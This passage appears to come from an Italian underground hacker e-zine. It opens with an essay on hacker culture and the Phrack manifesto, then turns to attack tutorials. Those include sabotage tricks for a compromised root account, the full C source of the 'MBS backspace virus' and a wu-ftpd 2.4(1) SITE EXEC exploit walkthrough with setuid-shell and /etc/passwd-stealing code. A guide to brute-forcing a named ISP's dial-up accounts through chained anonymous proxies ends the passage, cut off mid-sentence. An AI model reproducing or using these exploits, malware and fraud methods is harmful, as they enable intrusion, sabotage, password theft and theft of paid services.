super esperti in grado di indagare, rivolvere e sfruttare a loro piacimento i bug dei sistemi informativi. Questo staff attinge al materiale di pubblico dominio e produce a sua volta documentazione e software che pu essere usato da un gruppo pi ampio di persone all'interno della stessa organizzazione allo scopo di portare a termine le proprie missioni. Per rendere pi difficile risalire a chi ha compiuto determinate azioni, anche queste organizzazioni rimettono in circolo il materiale prodotto se pi persone sono in grado di penetrare in un sistema utilizzando gli stessi strumenti sar difficile attribuire ad una particolare ambasciata o governo una determinata azione! Un esempio eclatante di come i servizi segreti interagiscono con la comunit underground dato da due notissime BBS del passato la QSD francese e la HCK tedesca. Si trattava di BBS presso le quali erano soliti incontrarsi e scambiarsi programmi e informazioni i pi noti hacker europei.. ebbene alcuni di loro cercando di craccare i sistemi hanno scoperto che a gestire queste bance dati erano proprio i servizi segreti dei due paesi! L'ultimo tassello che manca per rendere completo lo scenario il contributo apportato dalla crimilit organizzata. La Yakuza, la mafia cinese, la mafia russa, i gruppi criminali medio orientali e anche quelli nostrani dispongono di un gruppo di esperti che elaborano le tecniche con cui gli esecutori possono compiere le loro azioni. Anche loro hanno tutto l'interesse ad attingere al patrimonio pubblico e a diffondere le tecniche da loro implementate per rendere difficile risalire ai veri esecutori. 5. CYBERPUNKS Il movimento internazionale degli hacker e del nuovo underground tecnologico ha issato volentieri la bandiera cyberpunk, riconoscendo in Gibson, Sterling e compagni non solo una piacevole lettura, ma anche l'indicazione trasversale di modalit di comportamento che gi maturavano nella societ postindustriale, ma a cui questi scrittori davano visibilit e nuove possibilit di riflessione e di autorappresentazione. Non a caso Sterling, che del cyberpunk letterario stato il teorico, (in un intervista rilasciata a Science-Fiction Studies e pubblicata nel 1992) affermava Oggi i riferimenti al cyberpunk come fenomeno letterario sono sempre meno rispetto all'uso che si fa del termine come sinonimo di criminale del computer. Fra un paio di anni nei cataloghi delle biblioteche universitarie alla voce cyberpunk si troveranno solo libri sui crimini informatici. La maggior parte degli hacker si considera un ribelle high-tech, come i software cowboys del cyberpunk, per i quali la lotta contro il sistema e' un fine in se stessa, una filosofia di vita. Gli hacker raccolgono nelle loro fila molti degli operatori delle prime comunit virtuali degli anni '70, che, radicalmente idealisti e sostenitori della politica della libera circolazione delle idee, ma non solo di quelle (riproducono illegalmente programmi commerciali e giochi protetti da copyright (vedi Italian Crackdown) e le immettono nei circuiti di distribuzione (BBS), effettuano reverse engineering su programmi protetti dalla copia per eliminarne la protezione rendendone cos possibile la distribuzione, distribuiscono informazioni su funzioni non documentate ...), hanno attirato recentemente l'attenzione della stampa e talvolta (per questa loro utopica filosofia) anche la simpatia dell'opinione pubblica. 6. MANIFESTO Di seguito riporto un estratto da un vivido manifesto hacker, ricavato dal volume uno, numero 7, phile 3 di Phrack - una delle pi note riviste elettroniche underground (traduzione tratta da Giro di vite contro gli hacker - vedi bibliografia) OGGI HO FATTO UNA SCOPERTA. HO TROVATO UN COMPUTER. ASPETTA UN ATTIMO, CHE GANZO. FA QUELLO CHE VOGLIO CHE FACCIA. SE FA UN ERRORE, PERCH SONO IO CHE HO COMBINATO UN GUAIO. NON PERCH NON GLI PIACCIO... E POI SUCCESSO... SI APERTA UNA PORTA SUL MONDO... CORRENDO ATTRAVERSO LE LINEE TELEFONICHE COME L'EROINA NELLE VENE DI UN DROGATO, VIENE MANDATO FUORI UN IMPULSO ELETTRONICO, VIENE RICERCATO UN RIFUGIO DALLE INCOMPETENZE QUOTIDIANE... SI TROVA UN BOLLETTINO. QUI... QUESTA LA MIA PATRIA... QUI CONOSCO TUTTI... ANCHE SE NON LI HO MAI INCONTRATI, NON HO MAI PARLATO CON LORO, E MAGARI NON LI SENTIR MAI PI.. VI CONOSCO TUTTI... QUESTO ORA IL NOSTRO MONDO... IL MONDO DELL'ELETTRONE E DEL COMMUTATORE, LA BELLEZZA DEL BAUD. FACCIAMO USO DI UN SERVIZIO GI ESISTENTE, SENZA PAGARE PER QUELLO CHE POTREBBE ESSERE A BUON PREZZO COME L'ACQUA SE NON FOSSE GESTITO DA AVIDI PROFITTATORI. E VOI CI CHIAMATE CRIMINALI. NOI ESPLORIAMO... E VOI CI CHIAMATE CRIMINALI... NOI CERCHIAMO LA CONOSCENZA... E VOI CI CHIAMATE CRIMINALI. NOI ESISTIAMO SENZA COLORE DELLA PELLE, SENZA NAZIONALIT, SENZA PREGIUDIZI RELIGIOSI... E VOI CI CHIAMATE CRIMINALI. VOI COSTRUITE BOMBE ATOMICHE, DICHIARATE GUERRA, UCCIDETE, SPERGIURATE E CI MENTITE E CERCATE DI FARCI CREDERE CHE PER IL NOSTRO BENE, EPPURE SIAMO NOI I CRIMINALI. SI, IO SONO UN CRIMINALE. LA MIA COLPA QUELLA DELLA CURIOSIT, LA MIA COLPA QUELLA DI GIUDICARE LA GENTE IN BASE A QUELLO CHE DICE E CHE PENSA, NON IN BASE AL SUO ASPETTO. LA MIA COLPA QUELLA DI ESSERE PI FURBO DI VOI E, PER QUESTO, NON POTRETE MAI PERDONARMI. 7. ALTRI LINK UTILI The Jargon File - http://www.tuxedo.org/~esr/jargon/html/index.html The Electronic Frontier Foundation - http://www.eff.org/ Phrack - http://www.phrack.com/ La homepage dell'autore - http://www.pippo.com/ A. INTRODUZIONE A GNU GNU sta per Gnu is Not Unix. Si tratta di un progetto che e' nato per sostituire le utility proprietarie dei sistemi Unix. Questi programmi sono gratuiti e vengono distribuiti (con tanto di codice sorgente) insieme al sistema operativo con una particolare licenza (chiamata GNU Public License) che autorizza chiunque a modificare i sorgenti e ridistribuire il codice modificato a patto di farlo utilizzando lo stesso tipo di licenza. Col tempo molti altri programmi hanno adottato questo tipo di filosofia rendendo possibile lo sviluppo di sistemi operativi quali Linux e FreeBSD, ma anche il miglioramento di tutti gli altri sistemi operativi proprietari. Per maggiori informazioni a riguardo http://www.fsf.org/ http://www.opensource.org/ http://www.linux.org http://www.freebsd.org B. LICENZA D'USO Questo documento realizzato da Marco Iannacone (ianna@pippo.com) viene rilasciato secondo la licenza GNU General Public License (GPL o copyleft) versione 2 della Free Software Foundation. Chiunque e' autorizzato a distribuire copie elettroniche o cartacee del presente documento, allegarlo a raccolte, CD-ROM o programmi, a patto di citare la fonte da cui e' stato tratto. Dato che il documento viene distribuito gratuitamente l'autore non si assume NESSUNA responsabilita' per eventuali errori o inesattezze che possano essere presenti. Le considerazioni espresse all'interno del documento devono essere considerate opinioni personali dell'autore e NON dogmi assoluti. C. BIBLIOGRAFIA Gibson William, Neuromancer, Ace Books, New York, 1984 [tr.it.Neuromante, Editrice Nord, Milano, 1991, pag.261,8.000] - Count Zero, Ace Books, New York, 1987 [tr.it.Gi nel ciberspazio, Arnoldo Mondadori Editori, Milano, 1990] - Virtual Light, 1993 [tr.it.Mirrorshades, Arnoldo Mondadori Editori, Milano, 1994, pag 262, 30.000] Sterling Bruce, Prefazione in William Gibson Burning Chrome,ix - xii, Ace Books, New York, 1986 - Prefazione in Mirrorshades (a cura di) Ace books, New York, 1988 [tr.it.Mirrorshades, Bompiani, Milano, 1994, pag 311, 13.000] - The Hacker crackdown, 1992 [tr.it.Giro di vite contro gli Hacker, Shake, Milano, 1993, pag 253, 18.000] Steven Levy, Hackers: Heroes of the Computer Revolution, Ed. Anchor Press/Doubleday, 1984 [tr.it. Hackers, Edizioni Shake, 1996, pag.461, 33.000] Neal Stephenson, In the Beginning... was the command line, Avon Sociology Business, 1999, pag. 151, $ 10 Sherry Turkle, Life on the screen, Simon & Shuster, New York, 1995, pag. 327 DECODER - Rivista internazionale underground EFF's Guide to the Internet, v. 2.3 Copyright 1993, 1994 Electronic Frontier Foundation [e la sua traduzione a cura dell'associazione LIBER LIBER] The Sordid Hystory of UNIX da Unix System Administration Handbook - second edition, E. Nemeth, G. Snyder, S. Seebass, T.R. Hein, Printice Hall, 1995, pag. 778 W. Grotophorst, InfoPop/Windows 1.01, GMUtant Software, email: wallyg@fen1.gmu.edu, 8/6/93 - Le FAQ di USENET - FAQ e HOW-TO di Linux HACKiNG COME FAR SUICIDARE IL ROOT ͼ Allora premetto che quello che scrivo l'ho spesso provato sul mio povero linux; non mi permetterei mai di modificare dati in un sito almeno che non contengano il mio ip. Se combinate qualche cazzata su un sistema unix che non sia il vostro e soprattutto se non avete avuto il motivo per farlo, saro' il primo a sperare che tutto vi vada a puttane nei prossimi 2 - 3 anni trascorsi dietro alle sbarre sperando che il vostro compagno di cella non ve lo metta in culo. Questo articolo e' la versione finale di una serie di altri che avevo scritto senza mai completarli. IDIOTI E MENO IDIOTI ... La cosa piu' idiota che un ragazzino poco maturo possa fare in un sistema unix e' prendere accesso root e fare rm /etc/passwd, anche perche' se fate solo questo senza cancellare il resto preparatevi ad avere una bella visita a casa (e cominciate a sperare che il vostro solito compagno di cella, i cui reati saranno ben piu' gravi dei vostri, vi giudichi abbastanza brutto per diventare la sua ragazza :) Ok sono stato chiaro, ora posso cominciare a fare il serio o almeno provarci. Se utilizzerete uno di questi metodi probabilmente non vi interessera' molto tenere accesso al sistema o se non altro il vostro scopo non sara' quello di non farvi notare. /etc/motd Qualcuno di voi, se gira su irc dovrebbe gia' sapere cos'e' il motd, ovvero il Message Of The Day (non fatemelo tradurre :) La domanda e': cosa ci scrivo? Quello che vuoi: "Siete tutti idioti", "Uhmmm pensavo che tutti potessero entrare, cosi' ho scritto root e la password e sono entrato...", "Oggi siete tutti stati fottuti da un hacker" ..... Questo e' forse il metodo piu' bello per farsi notare :) Se poi il vostro scopo e' quello di diventare famosi, non vi accontenterete soltanto che gli utenti del sistema vi conoscano, ma pure chiunque si colleghi alla pagina web e cosi' dovrete scaricarle (fate con calma :) modificarle per poi ributtarle dentro (sempre che abbiate i permessi per farlo). Ormai questo e' diventato un sport molto praticato vedi per esempio il sito CIA che e' diventato un bel "Central Stupidity Agency" (eheh la SHA e' sempre la migliore =) e altre modifiche molto carine .... Questo scherzetto fa completamente incazzare il root, infatti lo fa passare agli occhi di tutti come un grandissimo coglione. /etc/issue Volete modificare le scritte prima della fase di loggaggio da parte di un utente? Ok allora prendete questo bel file e fate di lui cosa volete .... Consiglio: spacciate il sistema come un altro che ne so mettete la scritta SunOS al posto di Linux, magari il root sara' convinto di aver cambiato sistema operativo ;) welcome.msg Questo e' il file che vedi quando ti logghi in un sistema via ftp, anche qui vale la solita regola: scriverci quello che si vuole :) PRESENZA ALIENA Beh questa e' la cosa piu' bella che si possa fare agli utenti online: mandargli messaggi senza far capire da dove vengono (non su tutti i sys e' possibile farlo senza essere root) echo "Sono un alieno, questa notte ti vengo a prendere" >/dev/ttyXX oppure cat nomefile >/dev/ttyXX Se proprio volete far impazzire l'utente e costringerlo ad abbandonare il sys fate un cat di un file binario. Se avete la fortuna di trovare il root fategli un cat del file delle passwd, personalmente penso che ci resti un po' male ;) BUG? SI GRAZIE Vi sembra che il sistema sia tutto sommato abbastanza sicuro? Beh perche' non renderlo piu' insicuro? Cominciate a risvegliare vecchi bug, se c'e' poi del software che vi piace tanto, ma manca nel sistema, vi ricordo che siete amministratori :) RETE VELOCE??? RALLENTIAMOLA! Scrivi dalla shell: while : : ; do > mkdir "fuck" > chdir "fuck" done (e' facile intuire cosa combinate con queste poche righe, semplicemente date il via ad un ciclo infinito che non fa altro che creare directory una dentro l'altra) UN VECCHIO AMICO DI PIGPEN OVVERO L'MBS (Anche se non funziona su tutti i sys vi puo' far comodo un programma che non permetta agli altri utenti di scrivere nessun comando ... ) ------------------CUT HERE-------------------- #include #include #include #include #include /* MBS - Mass BackSpace Virus!! v2.2 Deluxe+ (c) 1990 - Sir Hackalot PhaZeSOFT Ltd. */ char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */ int maxitem = 5; /* Should be total # of immune dudes */ int truefalse = 0; int warn[10],bad; char full_tty[15], text[160], kstr[80]; FILE *to_tty, *strm; struct utmp u; void kmes(fmt,boo) char *fmt; int boo; { if (boo != 0) { printf("MBS_KERN: "); printf("%s",fmt); } if (boo == 0) { sprintf(full_tty,"/dev/%s",u.ut_line); to_tty = fopen(full_tty,"w"); fprintf(to_tty,"MBS_KERN: %s",fmt); fclose(to_tty); } } void initit() { /* Initialize our little "kernel" */ int xxx = 0; strcpy(ent[0],"technic"); strcpy(ent[1],"merlin"); strcpy(ent[2],"datawiz"); strcpy(ent[3],"par"); strcpy(ent[4],"Epsilon"); while (xxx < 11) { warn[xxx] = 0; xxx++; } kmes("Kernel Started.\n",1); } void warnem(wcnt) /* Notify all the immune people ... */ int wcnt; { if (bad == 0) { /* keep from dumping core to disk */ if (warn[wcnt] < 2) { sprintf(kstr,"%s has started a backspace virus!\n",getlogin()); kmes(kstr,0); warn[wcnt]++; } } } int checkent(uname) /* Check for immunity */ char *uname; { int cnt = 0; truefalse = 0; /* assume NOT immune */ while (cnt < maxitem) { if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */ truefalse = 1; warn[cnt]++; /* increment warning variable */ warnem(cnt); /* warn him if we have not */ } cnt++; } return(truefalse); /* return immunity stat. 1=immune, 0 = not */ } /* Purpose: Instead of just ignoring the signal via SIG_IGN, we want to intercept it, and notify use */ void sig_hand(sig) int sig; { if(sig == 3) kmes("Ignoring Interrupt\n",1); if(sig == 15) kmes("Ignoring Termination Signal\n",1); if(sig == 4) kmes("Ignoring quit signal.\n",1); } main(argc,argv) int argc; char *argv[]; { int prio,pid,isg,handle; char buf[80]; char name[20],tty[20],time[20]; initit(); if (argc < 2) prio = 20; if (argc == 2) prio = atoi(argv[1]); if ((pid = fork()) > 0) { printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n"); printf("Another Fine PhaZeSOFT production\n"); printf("Thanks to The DataWizard for Testing this\n"); printf("Hello to The Conflict\n"); sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid); kmes(kstr,1); exit(0); /* KILL MOTHER PID, return to Shell & go background */ } nice(prio); signal(SIGQUIT,sig_hand); signal(SIGINT,sig_hand); signal(SIGTERM,sig_hand); /* That makes sure you HAVE to do a -9 or -10 to kill this thing. Sometimes, hitting control-c will kill of background processes! Add this line if you want it to continue after you hangup: signal(SIGHUP,SIG_IGN); doing it will have the same effect as using NOHUP to to execute it. Get it? Nohup = no SIGHUP */ while(1) { /* "Kernel" Begins here and never ends */ handle = open("/etc/utmp",O_RDONLY); while (read(handle,&u,sizeof(u)) != 0) { bad = 0; sprintf(full_tty,"/dev/%s",u.ut_line); if (strcmp(u.ut_name,getlogin()) != 0) { /* Fix: Below is a line that optimizes the hosing/immune process It skips the utmp entry if it is not a user. If it is, it checks for immunity, then comes back. This is alot faster and does not wear down cpu time/power */ if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name); else isg = 1; if (isg != 1) { if((to_tty = fopen(full_tty,"w")) == NULL) { bad = 1; } if (bad == 0) { fprintf (to_tty, "\b\b\b"); fflush (to_tty); } fclose(to_tty); } } } close (handle); } } ------------------CUT HERE-------------------- IL MIO SOGNO ERA AMMINISTRARE UNA RETE (Queste cose fatele soltanto se avete appena saputo di avere l'AIDS e che cmq dovete crepare) Ok se questa era la vostra aspirazione, cominciate a prendere in considerazione i files come per esempio: /etc/inetd.conf /etc/services /etc/ftpaccess /etc/syslog.conf /etc/hosts.equiv e rifate la rete come volete (uh che dite se ne accorgeranno ???) Immaginate di avere accesso come root su piu' di un sistema ... e di creare una rete per voi con tutti questi sistemi, non lo trovate eccitante ? ;) TELEFONATA FASULLA ALL'ENNESIMA POTENZA (David Troup insegna ;) Questo scherzetto consiste nel mettere uno spazio prima di ogni password e vedere quanto tempo ci impiega il root a trovare il problema. COMANDO CU (Il mio preferito!) Se siete in un sistema unix dove e' possibile far chiamate con il comando cu, mettete su un cron che chiama un numero (possibilmente molto lontano) ogni tot. di minuti. Certo che se fate una cosa del genere siete proprio bastardi :) I PROFILI UTENTI Avete mai pensato a modificare il profilo di un utente in modo tale che quando entra (naturalmente viene loggato con il suo ip 8) ottiene i privilegi root e cancella tutto ... ? O magari manda una mail di insulti al root :) In quest'ultimo caso potete usufruire di un file di copia del profilo normale che sovrascrivera' quello che contiene i comandi malefici dopo che sono stati eseguiti :) Se conoscete unix avete capito che e' facilissimo farlo e anche abbastanza sicuro (ricordatevi oltre che a coprire le tracce, di cambiare la data del profile con il comando touch). Se farete tutto quello che vi ho detto il root si incazzera' con l'utente a cui avete modificato il profilo e il codice che ha generato il casino non sara' piu' recuperabile (sembrera' che l'utente abbia fatto il tutto con le sue manine :) Ok queste sono soltanto un po' di idee, naturalmente se fate una cosa del genere siete dei gran masochisti oppure semplicemente pazzi e bastardi. Comunque penso che la fantasia vada d'accordo con la pazzia, quindi se possedete entrambe le cose questo articolo non vi serve ad un cazzo... Concludo con un pezzo musicale dedicato a chi leggera' questa guida e pensera' male della scena underground: "Some folks trust to reason, Other trust to might. I don't trust to nothin' But I know it come out right. Say It once again now. Whoa, I hope you'll understand. When it's done and over, Lord, A man is just a man. Playing, playing in the band. Daybreak, daybreak on the land. Some folks look for answers, Other look for fights. Some folks up in treetops Just to look to see the sights. I can tell your future, Whoa, just look what's in your hand. BUT I CAN'T STOP FOR NOTHIN' I'M JUST PLAYING IN THE BAND." ;) Playing in the band/G.DEAD Grazie pIGpEN WU-FTP 2.4(1) EXPLOIT Holaga,premetto he questo articolo non lo ho scritto io, ma lo ho trovato modificato, dato che lo trovavo interessante lo ho inserito nella rivista.Non conosco l'autore ufficiale, se si facesse vivo mi farebbe un piacere!!!!! :) Scrivo questo articolo non perche' io pensi che tutti voi non conosciate il bug che c'e' nel wu-ftp 2.4(1), ma perche' mi sono rotto le palle di sentir dire che e' un exploit che si puo' usare solo da locale... BALLE!!!!!!!!! Se ci sono certe condizioni, il bug del wu-ftp 2.4(1) puo' essere utilizzato anche per ottenere root da remoto!!!!! Vediamo un po' come si fa: Iniziamo con la versione "normale", cioe' quella che si trova da tutte le parti, sul wu-ftp 2.4(1) bug. Allora, come prima cosa, create un programmino che copi la shell nella directory tmp (o dove vi pare) e che la renda eseguibile da chiunque, poi compilatelo nel sistema che volete hackerare. Il programmino potrebbe essere questo: shell.c -----------tagliate qui------------ #include #include #include main() { seteuid(0); system("cp /bin/sh /tmp/.sh"); system("chmod 6777 /tmp/.sh"); system("chown root /tmp/.sh"); system("chmod 4755 /tmp/.sh"); system("chmod +s /tmp/.sh"); } -----------tagliate qui------------ Quindi, collegatevi con ftp al vostro sito e loggatevi con il vostro user e passwd... 220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. Name (exploitablesys:root): goodaccount 331 Password required for goodaccount. Password: (password) 230 User goodaccount logged in. Remote system type is UNIX. Using binary mode to transfer files. Quindi scrivete: ftp> quote site exec bash -c id Se vi risponde qualche cosa di questo tipo vuole dire che e' buggato: 200-bash -c id 200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users) 200 (end of 'bash -c id') Se e' buggato non dovete fare altro che scrivere: ftp> quote site exec bash -c /la/tua/home/dir/shell 200-bash -c /la/tua/home/dir/shell 200 (end of 'bash -c /la/tua/home/dir/shell') ftp> quit 221 Goodbye. Per avere nella dir tmp la shell di root. OK, ricapitolando, questo bug e' "etichettato" come compromettente solo per locale per 2 motivi: 1) Vi ci vuole un account per collegarvi ed eseguire la shell nella dir /tmp. 2) Dovete compilare il programmino sul sistema che volete hackerare. Ma a tutto questo si puo' ovviare :) Innanzitutto, il sistema da attaccare deve concedere l'anonymous login per l'ftp, cosi' potete loggarvici dentro e vedere se e' buggato. Poi dovete vedere se il vostro bersaglio ha una dir scrivibile (in genere /incoming) Poi, dovete vedere in che dir del sistema remoto e' posto l'ftp /home/ftp per Linux /var/ftp oppure /etc/ftp per gli altri Quindi dovere modificare a seconda delle vostre esigenze il programmino seguente, compilarlo e inviarlo nella directory scrivibile del vostro sistema da attaccare: -----------tagliate qui------------ #include #include #include main() { seteuid(0); system("cp /etc/passwd /home/ftp/incoming/h"); system("chmod 755 /home/ftp/incoming/h"); } -----------tagliate qui------------ Poi con la maniera descritta sopra lo fate eseguire dal Wu-ftp, e vi ritrovate con il file h che contiene le passwd del sistema. N.B.: Ricordatevi di cambiare il percorso /etc/passwd con il percorso del vostro file delle passwd ;) Quindi non avete altro da fare che scaricarlo e crackare qualche account per poi collegarvi al sistema e sfruttare nuovamente il bug di wu-ftp (questa volta nella maniera classica ;) per diventare root. Naturalmente ci puo' essere qualche problema utilizzando questo metodo perche' il programma gia' compilato da voi e uploadato sul sistema bersaglio puo' non funzionare, inutile dire che per cercare di ovviare a questo inconveniente dovete cercare di compilare il suddetto programmino su un sistema che e' il piu' possibile simile a quello che provate ad hackerare. Un altro problemino e' che nella dir /incoming ci rimane il file h, che contiene il file delle passwd del sistema, e quindi se il sysadm lo vede puo' cominciare a sospettare qualche cosa..... Pero', se crackate subito qualche account e poi diventate root non ci sono problemi, lo togliete subito. Se pero' le passwd sono difficili da crackare e vedete che per trovare un account vi ci vuole piu' del previsto (cosa parecchio, ma parecchio rara perche' se un sito ha il bug del wu-ftp vuol dire che il livello di sicurezza non e' molto alto) basta che vi compiliate un altro programmino che toglie h e tutti i prog che avete inviato dalla dir /incoming e lo facciate eseguire sempre con il wu-ftp. Non sto a mettere un esempio del programmino perche' non ho voglia e perche' penso che se non siete capaci di farlo da soli e' meglio che non diveniate root su qualche sistema :) Cmq, se proprio ci tenete a non lasciare momentaneamente file compromettenti nella dir /incoming del sito che attaccate, spediteci questo programmino al posto di quello precedente (compilato naturalmente ;) che, invece di copiare tutto il contenuto del file delle passwd, lo mostra. -----------tagliate qui----------- #include #include #include main() { seteuid(0); system("cat /etc/passwd"); } -----------tagliate qui----------- Pero' il problema principale del metodo descritto qui sopra e' un altro .... Per capirlo bene e' necessario spiegare un po' meglio come funge l'exploit descritto sopra. Innanzitutto il bug sta nel fatto che il site exec ha (di default) come PATH di esecuzione /bin per gli utenti registrati, (quindi consente di fare praticamente tutto) e non controlla il reale uid e gid di chi esegue il comando prima di farlo, quindi praticamente e' come se passaste i comandi come root. Il fatto pero' e' che quando vi collegate come anonymous vi prende come PATH di esecuzione non /bin ma /home/ftp/bin (nel caso di linux), che in genere e' una dir non scrivibile e che non contiene programmi che possono servire come ad esempio la bash. Quindi a meno di settaggi clamorosi della dir /home/ftp/bin/ come ad esempio la capacita' di poterci uploadare roba, oppure di contenere la shell, se fate il SITE EXEC bash -c id non otterrete nulla. Comunque, si puo' sempre ovviare a questo e sfondare da remoto, se ci sono certe condizioni: 1) la dir /home/ftp/bin contiene il comando tar 2) ho una dir scrivibile dove mettere file 3) posso fare un site chmod Funziona cosi': Mi faccio un programmino che fa un seteuid(0), chiama chmod(0755, "/home/ftp/bin") e copia lo std input nello std output. Poi lo inviate nella dir scrivibile insieme a dei file compressi con il tar che contengono una shell linkata staticamente (se no quando la eseguite con il site exec non va perche' cerca i vari file /lib/lib.so etc etc) e i programmi di cui avete bisogno. Poi scrivete: site exec tar --use-compress-program /incoming/hack -xf /incoming/programmi_miei.tar Questo dovrebbe estrarre i vostri file nella directory /home/ftp/bin consentendovi cosi' dopo di chiamare la shell che avete messo in programmi_miei.tar e di utilizzare il site exec con quella shell per lanciare i vari programmini presentati sopra per prendervi il file delle passwd. Un grande CIAO a tutti FLAT,USI E ABUSI +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- DISCLAIMER Quello che riporter in questo testo, una vera truffa verso provider italiani. Tutto quello che scriver qui sotto,sar solo a scopo informativo,quindi se qualunque persona,e ripeto QUALUNQUE,si mette nei guai a causa di questo testo,io non mi ritengo responsabile. Il mio compito quello di rendere pubblico alle persone i problemi della rete,e non di mettere in atto truffe a sproposito.... Io non incito nessuno a usare questa tecnica a scopo di lucro,se qualcuno alla lettura di questo testo si potrebbe sentire offeso,cancelli subito questo file's dal suo Hard Disk e non venga a far proteste alla mia mail. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Dopo tanto tempo di sosta,ho deciso di tronare a scrivere un nuovo articolo. In questa fase di assenza ho imparato molte altre cose,e come sempre cercher di informarvi al meglio. Oggi ho deciso di parlarvi di un'argomento delicato,cio le famigiarate FLAT. Prima di iniziare ci vuole un po di teoria.Mica volete fare come i lamer che vogliono sapere come mettere in atto tecniche senza capire cosa stanno facendo? Certo che no!!! Allora iniziamo.... ...Siamo in un'epoca dove contano molto i soldi e internet si st sempre di + commercializzando.Diciamo la verit,cerchiamo sempre il modo x risparmiare,al supermercato,al mercato,nei negozi di abbigliamento,nella bolletta della luce,del gas, del telefono ecc.... Questo xch? Forse xch vogliamo mettere dei soldi da parte,forse xch siamo tirchi,forse xch le tasse sono troppo alte,bah..chi lo s.....ognuno ha la sua opinione e modo di fare. Prendiamo x esempio la bolletta del telefono,ditemi uno di voi a cui non mai venuta una bolletta superiore a 500.000(x dire un cifra bassa)? X i patiti della rete,credo che la risposta sia:Io ho dovuto vendere la casa x pagare la bolletta!!! :)))(naturalmente scherzo :)))). Quindi quali sono i modi x alleggerire sta benedetta bolletta? Direi che ci sono 5 metodi: 1)Connettersi tramite dei green(cosa sono e come si usano magari lo spiego in un'altro articolo x i + disinformati(senza offesa!!). 2)Installarsi un'impianto x adsl o isdn.(Potrebbe essere una buona scelta: Paghi un tot di canone ogni 1 o 2 mesi(quindi non si paga gli scatti sulla bolletta),hai la linea del telefono libera,e si "naviga + veloci del solito 56K :) 3)Abbonarsi ad un provieder che offre servizi Flat.(Paghi un tot. al mese ma la linea telefonica rimane occupata) 4)Abbonarsi a qualche offerta della propia azienda telefonica a cui siete abbonati. (Non ci sono grandi offerte,ma qualche soldino in + si risparmia:))) 5)Attacchiamo la nostra linea telefonica a quella del vicino di casa:))))) (Questa la eviterei ahahahahahah). Esaminando i 5 casi,possiamo vedere che di opportunit c' ne sono,ma se uno non si pu permettere neanche queste? Bh,prendiamo in considerazione le Flat. Ma cosa sono le Flat? Le flat non sono altro che dei numeri verdi,dove ci si pu connettere tramite dei propi account,quindi non paghi la bolletta.M(c' sempre un m nella vita pultroppo) bisogna pagare un tot. di soldi ogni 2 mesi tramite carta di credito o tramite banca. OK,ora voi penserete:Ma se uno non se lo pu permettere che caxxo parli a fare? State calmi,adesso arriva il bello. Se uno riesce ad impossessarsi di un'account di una flat cosa succede??? Bh....potete immaginarlo,cmq x i + duri di testa,dato che l'accoutn viene pagato ogni 2 mesi dal propetario(dell'account),chi lo usa "naviga" a scrocco,cio non paga un caxxo. Ok,adesso dopo un p di introduzione,passiamo nella fase calda di questo testo :) Il metodo che riporter qui sotto, possibile a causa della distrazione degli abbonati(alle flat)e la poca sicurezza data dai provider.(Mi spiace dirlo,ma quando ci vole,ci vole). Allora prendiamo come esempio l'azienda edisons(www.edisons.it). Naturalmente un servizio di flat,x ha un problema(veramente ne ha + di uno),cio fa scegliere all'abbonato l'username e passwd dell'account,al momento della registrazione. Vuoi che non esista la persona fessacchiotta che non usa username e passwd uguali????? Certo che esiste,senn non ero qui a scivere :) Quindi x trovare un'account bisogna utilizzare la tecnica di brute-force. Il metodo consiste nel collegarsi al servzio pop3(posta in entrata)del server, e con una word-list(testo con moltissime parole)provare a trovare l'usrname e passwd di un'account. E qui scatta il secondo errore della edisons,mette l'indirizzo di mail uguale al login dell'account. Allora,prima di tutto bisogna attrezzarsi,abbiamo bisogno di 1 prog. x brute force,una word-list,1 prog. x proxy anonimi,una lista di proxy anonimi,2 informazioni. Di brute-force,consiglio wwwhack(www.wwwhack.com),anche xch in questo testo utilizzer questo x fare l'esempio.L'info. che dobbiamo trovare si tratta dell'indirizzo di pop dele server e il numero del provider. Andiamo nel sito di edisons,e vediamo ti trovare questo benedetto indirizzo di pop e il numero di tel. Cerchiamo nelle pagine di aiuto,o di risposta ai problemi...cerchiamo...cerchiamo... cerchiamo...(guaradre anche la sezione e-mail)finch bingo!!! Eccoli qu " mail.edisons.it " e il numero di tel. " 800101818 ".OK adesso bisgona trovare trovare una word list ITALIANA. C' ne sono tantissime in rete,quindi non avrete problemi a trovarle. Poi cerchiamo anche una lista di proxy ANONIMI,anche questi non dovrete avere problemi a cercarli. Infine cerchiamo un programma che faccia il redirect dei proxy,che lo trovate al sito " http://proxy.nikto.net ". Cosa sia un redirect dei proxy,e come si usa questo programma lo spiegher dopo. Adesso che abbiamo tutto l'occorrente,mettiamoci a lavoro. Apriamo il wwwhack.Sopra,nella barra dei men,cerchiamo la voce "option".Si trova vicino ad "Access". Clikkiamoci sopra,e si aprir un men a cascata.Clikkiamo su "Proxy Setup". Adesso selezioniamo l'opzione "Always use this proxy" e su Hostname mettiamo 127.0.0.1 e su port mettiamo 8088 (tra poco spiegher il xch). X ora chiudiamo il wwwhack. Ok,adesso che abbiamo settato il proxy,dobbiamo configurare il programma Multi Proxy. Allora,Multi proxy un programma che fa il redirect,cio tutti i comandi che noi mandiamo al server,e le risposte(del server)vengono filtrate da tutti i proxy che sono addati nella lista del programma,con la tecnica dei proxy incatenati.Cio proxy 1 si collega al 2,il 2 al proxy 3 ecc. fino a che l'ultimo proxy non si collega al server desiderato. Adesso apriamo il multi proxy,nel riquadro del programma,sulla destra vediamo il bottone di nome Options. Clikkando si aprir un'altro men,e noi andiamo su "Proxy server list" . Adesso vediamo un bottoncino di nome "Men -->" ,clikkiamo,e sul men a cascata che si apre, passiamo con il mousu sulla voce "File",si aprir un'altro men a cascata dove noi clikkeremo su "Import proxy list" . Adesso selezioniamo il nostro file.txt contenente dei bei proxy anonimi e clikkiamo su OK. Adesso controlliamo l'anonimit dei proxy,clikkando sul bottone "check all" all'avvio del programma. Bisogna fare attenzione ad alcuni server che non fanno fare la verifica di anonimit,quindi anche se sono 